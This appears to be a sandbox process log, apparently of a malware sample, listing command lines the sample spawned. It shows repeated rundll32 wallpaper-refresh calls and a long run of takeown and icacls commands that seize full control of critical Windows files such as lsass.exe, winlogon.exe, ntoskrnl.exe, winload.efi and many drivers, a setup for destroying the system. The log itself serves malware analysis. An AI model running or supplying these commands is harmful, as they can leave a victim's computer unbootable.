"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-210238553016917089331010034836-1567596916-1827639105-659246687-2075062454-1565333383"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-21155673116816260131997062280-1095554101-1292021758-1491836792-3352399501927153593"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "13669794761094653553-205795711-6853691541595159405436150691-739119374-1113539486"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\smss.exe && icacls C:\Windows\System32\smss.exe /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\csrss.exe && icacls C:\Windows\System32\csrss.exe /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\smss.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\wininit.exe && icacls C:\Windows\System32\wininit.exe /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\csrss.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\lsass.exe && icacls C:\Windows\System32\lsass.exe /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\smss.exe /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\wininit.exe

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\csrss.exe /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\LogonUI.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\services.exe && icacls C:\Windows\System32\services.exe /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winlogon.exe && icacls C:\Windows\System32\winlogon.exe /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\wininit.exe /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\LogonUI.exe /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\lsass.exe

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\services.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.efi && icacls C:\Windows\System32\winload.efi /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\lsass.exe /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.exe && icacls C:\Windows\System32\winload.exe /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\services.exe /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\ntoskrnl.exe && icacls C:\Windows\System32\ntoskrnl.exe /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\svchost.exe && icacls C:\Windows\System32\svchost.exe /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\winload.efi

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\winlogon.exe

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\winload.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\smss.exe && icacls C:\Windows\SysWOW64\smss.exe /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\ntoskrnl.exe

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\winload.efi /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\csrss.exe && icacls C:\Windows\SysWOW64\csrss.exe /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\winlogon.exe /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\wininit.exe && icacls C:\Windows\SysWOW64\wininit.exe /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\winload.exe /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\ntoskrnl.exe /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\svchost.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\LogonUI.exe && icacls C:\Windows\SysWOW64\LogonUI.exe /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\lsass.exe && icacls C:\Windows\SysWOW64\lsass.exe /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\smss.exe

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\csrss.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\services.exe && icacls C:\Windows\SysWOW64\services.exe /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winlogon.exe && icacls C:\Windows\SysWOW64\winlogon.exe /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\LogonUI.exe

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\wininit.exe

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\lsass.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.efi && icacls C:\Windows\SysWOW64\winload.efi /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.exe && icacls C:\Windows\SysWOW64\winload.exe /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\svchost.exe /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\SysWOW64\wininit.exe /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\ntoskrnl.exe && icacls C:\Windows\SysWOW64\ntoskrnl.exe /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\services.exe

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\winlogon.exe

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\winload.efi

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\svchost.exe && icacls C:\Windows\SysWOW64\svchost.exe /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\winload.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394bus.sys && icacls C:\Windows\System32\drivers\1394bus.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\svchost.exe

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\ntoskrnl.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394ohci.sys && icacls C:\Windows\System32\drivers\1394ohci.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpi.sys && icacls C:\Windows\System32\drivers\acpi.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\SysWOW64\svchost.exe /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpipmi.sys && icacls C:\Windows\System32\drivers\acpipmi.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\1394bus.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\SysWOW64\ntoskrnl.exe /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adp94xx.sys && icacls C:\Windows\System32\drivers\adp94xx.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\1394ohci.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\1394bus.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\1394ohci.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpahci.sys && icacls C:\Windows\System32\drivers\adpahci.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpu320.sys && icacls C:\Windows\System32\drivers\adpu320.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\afd.sys && icacls C:\Windows\System32\drivers\afd.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\adp94xx.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\agilevpn.sys && icacls C:\Windows\System32\drivers\agilevpn.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1743243246110326044316636768-13933959559582312582017733875-14720616462114132855"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\acpi.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AGP440.sys && icacls C:\Windows\System32\drivers\AGP440.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\adp94xx.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\acpipmi.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\afd.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\acpi.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\acpipmi.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\aliide.sys && icacls C:\Windows\System32\drivers\aliide.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1168732066-3464805642056026499276143827-476238947182205371315290063362127953582"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\afd.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\adpahci.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\adpahci.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdide.sys && icacls C:\Windows\System32\drivers\amdide.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\agilevpn.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\adpu320.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdk8.sys && icacls C:\Windows\System32\drivers\amdk8.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\AGP440.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\aliide.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\agilevpn.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\aliide.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\adpu320.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\AGP440.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdppm.sys && icacls C:\Windows\System32\drivers\amdppm.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsata.sys && icacls C:\Windows\System32\drivers\amdsata.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\amdide.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\amdide.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\amdppm.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsbs.sys && icacls C:\Windows\System32\drivers\amdsbs.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\amdk8.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\amdppm.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdxata.sys && icacls C:\Windows\System32\drivers\amdxata.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\appid.sys && icacls C:\Windows\System32\drivers\appid.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\amdk8.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arc.sys && icacls C:\Windows\System32\drivers\arc.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\amdsata.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\amdsbs.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arcsas.sys && icacls C:\Windows\System32\drivers\arcsas.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\amdsbs.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\amdsata.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\asyncmac.sys && icacls C:\Windows\System32\drivers\asyncmac.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\amdxata.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\appid.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\atapi.sys && icacls C:\Windows\System32\drivers\atapi.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\amdxata.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\arcsas.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\arc.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\appid.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\asyncmac.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ataport.sys && icacls C:\Windows\System32\drivers\ataport.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\arcsas.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\b57nd60a.sys && icacls C:\Windows\System32\drivers\b57nd60a.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\asyncmac.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\arc.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\battc.sys && icacls C:\Windows\System32\drivers\battc.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\atapi.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ataport.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\beep.sys && icacls C:\Windows\System32\drivers\beep.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\atapi.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ataport.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\blbdrive.sys && icacls C:\Windows\System32\drivers\blbdrive.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bowser.sys && icacls C:\Windows\System32\drivers\bowser.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\b57nd60a.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\battc.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\b57nd60a.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrFiltLo.sys && icacls C:\Windows\System32\drivers\BrFiltLo.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrFiltUp.sys && icacls C:\Windows\System32\drivers\BrFiltUp.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bridge.sys && icacls C:\Windows\System32\drivers\bridge.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\battc.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\beep.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\bowser.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrSerId.sys && icacls C:\Windows\System32\drivers\BrSerId.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\BrFiltUp.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\BrFiltLo.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\bowser.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\beep.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\BrFiltUp.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\blbdrive.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\BrFiltLo.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\blbdrive.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\bridge.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrSerWdm.sys && icacls C:\Windows\System32\drivers\BrSerWdm.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrUsbMdm.sys && icacls C:\Windows\System32\drivers\BrUsbMdm.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\bridge.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\BrSerId.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrUsbSer.sys && icacls C:\Windows\System32\drivers\BrUsbSer.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\BrSerWdm.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\BrSerWdm.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\BrUsbMdm.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bthmodem.sys && icacls C:\Windows\System32\drivers\bthmodem.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bxvbda.sys && icacls C:\Windows\System32\drivers\bxvbda.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\BrSerId.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\BrUsbMdm.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\BrUsbSer.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdfs.sys && icacls C:\Windows\System32\drivers\cdfs.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\bthmodem.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\BrUsbSer.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdrom.sys && icacls C:\Windows\System32\drivers\cdrom.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\bthmodem.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\circlass.sys && icacls C:\Windows\System32\drivers\circlass.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\bxvbda.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\cdfs.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\bxvbda.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\cdfs.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Classpnp.sys && icacls C:\Windows\System32\drivers\Classpnp.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CmBatt.sys && icacls C:\Windows\System32\drivers\CmBatt.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1799722272-1099004074-77107880120776206646494299541121092589-1291408077-1863244836"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cmdide.sys && icacls C:\Windows\System32\drivers\cmdide.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cng.sys && icacls C:\Windows\System32\drivers\cng.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\circlass.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\cdrom.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\circlass.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\compbatt.sys && icacls C:\Windows\System32\drivers\compbatt.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\cdrom.sys /grant "Admin:F"

